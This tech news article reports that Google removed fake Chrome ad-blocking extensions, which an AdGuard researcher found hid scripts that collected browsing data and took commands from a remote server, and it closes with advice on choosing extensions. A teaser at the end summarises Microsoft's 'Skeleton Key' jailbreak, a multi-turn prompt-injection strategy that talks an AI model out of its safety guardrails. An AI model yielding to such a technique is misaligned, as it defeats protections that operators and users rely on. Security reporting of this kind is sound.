Skip to main content

20 million Chrome users are fooled into downloading fake ad blockers

Google removed a number of fake ad blockers from its Chrome store after an AdGuard researcher discovered that these extensions concealed malicious scripts. The code hidden within these fake ad blocking extensions was used to collect information about a user’s browsing session and to change the browser’s behavior.

Some of these extensions were popular, with one fake ad blocker garnering as many as 10 million downloads. Even the least popular extension, Webutation, had 30,000 downloads.

These malicious ad-blocking extensions merely copied the legitimate ad blocking code from real ad blockers and added its own harmful one.

“All the extensions I’ve highlighted are simple rip-offs with a few lines of code and some analytics code added by the ‘authors,’” AdGuard’s Andrew Meshkov wrote. “Instead of using tricky names they now spam keywords in the extension description trying to make to the top search results.”

Given that most casual users don’t really pay attention to the name of an extension as long as it was somewhere near the top of their search results, it’s easy to deceive a large number of Chrome users to download fake ad blockers. Combined, all five of the flagged — and now removed — ad blockers generated 20 million downloads, according to AdGuard.

“Basically, this is a botnet composed of browsers infected with the fake adblock extensions. The browser will do whatever the command center server owner orders it to do,” he wrote.

The malicious code sends the data it collects, including your browsing information, to a remote server. The server then sends a command to an extension that is concealed inside an innocent image, and the commands are executed as scripts to change the way your browser behaves.

To protect yourself, AdGuard recommends that you only download browser extensions from trusted authors and companies. If you don’t know the author, Meshkov recommends skipping the extension. Even if the extension comes from a trusted author, the software could be sold to another party in the future, which could then change the intended use or behavior of the extension.

If you’re looking for an ad block, be sure to check out our list of recommendations for some of the best ad blocking extensions.

Chuong Nguyen
Silicon Valley-based technology reporter and Giants baseball fan who splits his time between Northern California and Southern…
A dangerous new jailbreak for AI chatbots was just discovered
the side of a Microsoft building

Microsoft has released more details about a troubling new generative AI jailbreak technique it has discovered, called "Skeleton Key." Using this prompt injection method, malicious users can effectively bypass a chatbot's safety guardrails, the security features that keeps ChatGPT from going full Taye.

Skeleton Key is an example of a prompt injection or prompt engineering attack. It's a multi-turn strategy designed to essentially convince an AI model to ignore its ingrained safety guardrails, "[causing] the system to violate its operators’ policies, make decisions unduly influenced by a user, or execute malicious instructions," Mark Russinovich, CTO of Microsoft Azure, wrote in the announcement.

Read more